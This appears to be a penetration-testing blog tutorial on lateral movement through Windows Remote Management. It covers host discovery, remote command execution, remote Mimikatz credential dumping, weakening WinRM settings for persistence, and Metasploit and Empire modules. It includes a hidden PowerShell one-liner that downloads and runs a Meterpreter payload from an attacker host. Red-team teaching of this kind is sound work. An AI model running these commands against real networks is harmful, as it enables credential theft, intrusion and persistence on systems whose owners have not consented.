Lateral Movement – WinRM

WinRM stands for Windows Remote Management and is a service that allows administrators to perform management tasks on systems remotely. Communication is performed via HTTP (5985) or HTTPS SOAP (5986) and support Kerberos and NTLM authentication by default and Basic authentication. Usage of this service requires administrator level credentials.

In a red team scenario if local administrator access has been achieved then these credentials can be used for lateral movement inside the network if  WinRM is used for management of servers.

Discovery

Hosts with port 5985 open have the WinRM service running. A simple Nmap scan can be used to determine these hosts.

nmap -p 5985 -sV 10.0.0.2 10.0.0.1
WinRM - Port Discovery
WinRM – Port Discovery

If port 5985 is open but port 5986 is closed this means that the WinRM service is configured to accept connections over HTTP only and encryption is not enabled.

WinRM - Ports
WinRM – Ports

From a system that has already local administrator access and these privileges are shared with the target system the PowerShell Invoke-Command can be used for command execution over the WinRM service.

Invoke-Command -ComputerName TARGET -ScriptBlock { dir c:\ }
WinRM - Command Execution
WinRM – Command Execution

Mimikatz can also executed remotely for retrieval of credentials stored in memory and without dropping any binary into disk.

Import-Module ./Invoke-Mimikatz.ps1
Invoke-Mimikatz -ComputerName TARGET
WinRM - Mimikatz
WinRM – Mimikatz

These credentials can then be used to access other systems which can lead possibly to domain escalation.

For systems that don’t run WinRM it is possible to enable and configure this service for persistence by using a legitimate Windows service. The following command will enable WinRM.

Enable-PSRemoting -Force
WinRM - Enable the Service
WinRM – Enable the Service

By default it might not be possible to connect to another system over WinRM and additional configuration might needed. The following commands will assist to configure the service properly for HTTP access from any host.

winrm quickconfig
winrm set winrm/config/Client @{AllowUnencrypted = "true"}
Set-Item WSMan:localhost\client\trustedhosts -value *

Dave Hardy has written a great post about PowerShell PSRemoting Pwnage which contains additional commands. Alternatively WinRM can be configured from the Local Group Policy.

WinRM - Local Group Policy
WinRM – Local Group Policy

WinRS

Windows Remote Shell (WinRS) is a command line tool that is part of Windows 2008 and later. If WinRM is enabled this utility can be used to execute commands on a host remotely. The cmd argument will establish a new shell over command prompt.

winrs -r:http://WIN-2NE38K15TGH/wsman "cmd"
WinRS - CMD
WinRS – CMD

Alternatively instead of a shell command prompt commands can be executed in order to perform a silent recon on the target.

winrs -r:http://WIN-2NE38K15TGH/wsman "net localgroup administrators"
WinRS - Command Execution
WinRS – Command Execution

It is also possible to upgrade the Windows Remote Shell access to a Meterpreter session via the Metasploit web delivery module. The module will generate a payload which will be hosted locally and will generate the PowerShell command that needs to be executed on the target.

use multi/script/web_delivery
WinRS - Metasploit Web Delivery
WinRS – Metasploit Web Delivery

Executing the PowerShell command from a system that is already connected via WinRS will download and execute the arbitrary code.

powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$h=new-object net.webclient;$h.proxy=[Net.WebRequest]::GetSystemWebProxy();$h.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $h.downloadstring('https://10.0.0.3:8080/4WM88bQsuZS');
WinRS - Execute PowerShell Command
WinRS – Execute PowerShell Command

A Meterpreter session will open which will provide more flexibility in regards to post exploitation activities.

WinRS - Metasploit Meterpreter
WinRS – Metasploit Meterpreter

Interaction with the new system can be achieved with the command sessions and the associated session number.

WinRS - Meterpreter Session
WinRS – Meterpreter Session

Metasploit

Metasploit Framework has several modules which can be utilized for the discovery of hosts that have the WinRM service enabled, discovery of credentials for service authentication and for executing arbitrary commands and code. The following module can discover systems with WinRM service enabled and their supporting authentication protocols.

auxiliary/scanner/winrm/winrm_auth_methods
Metasploit - WinRM Auth Methods
Metasploit – WinRM Auth Methods

If local administrator credentials have been obtained then these credentials can be used to authenticate with other hosts via the WinRM service. The following module can determine if local administrator credentials are valid for other systems.

auxiliary/scanner/winrm/winrm_login 
Metasploit - WinRM Discovery of Credentials
Metasploit – WinRM Discovery of Credentials

Metasploit has also a module which can execute arbitrary commands over the WinRM service. This module requires local administrator credentials, the domain and the target host.

auxiliary/scanner/winrm/winrm_cmd
Metasploit - WinRM Command Execution
Metasploit – WinRM Command Execution

The output of the command will be returned:

Metasploit - WinRM Command Output
Metasploit – WinRM Command Output

Arbitrary code execution is also possible over WinRM and the following module. The module requires local administrator credentials and the list of hosts that the code will executed. This module can be used for lateral movement purposes into hosts that share the same local administrator account.

exploit/windows/winrm/winrm_script_exec
Metasploit - WinRM Code Execution Module Configuration
Metasploit – WinRM Code Execution Module Configuration

Upon exploitation the module will attempt to modify the PowerShell execution policy to allow execution of unsigned scripts. Then a PowerShell script will be written into disk and executed automatically in order to return a Meterpreter session. The module will also attempt to migrate into a SYSTEM level process to avoid loss of the shell due to time limit restriction of WinRS.

Metasploit - WinRM Code Execution
Metasploit – WinRM Code Execution

Empire

For engagements that utilize Empire there is a PowerShell module which can execute code remotely over WinRM in order to expand access inside a network. Requirements for usage of this module are: local administrator credentials, a listener, an agent and a target host.

usemodule lateral_movement/invoke_psremoting 
Empire - PSRemoting
Empire – PSRemoting

The list of active agents can be retrieved with the command agents. The following command will interact with the new agent X5DACN91.

interact
Empire - List of Agents
Empire – List of Agents

Post exploitation commands can be executed on the host that has been compromised through the WinRM service.

Empire - Command Execution via WinRM
Empire – Command Execution via WinRM

References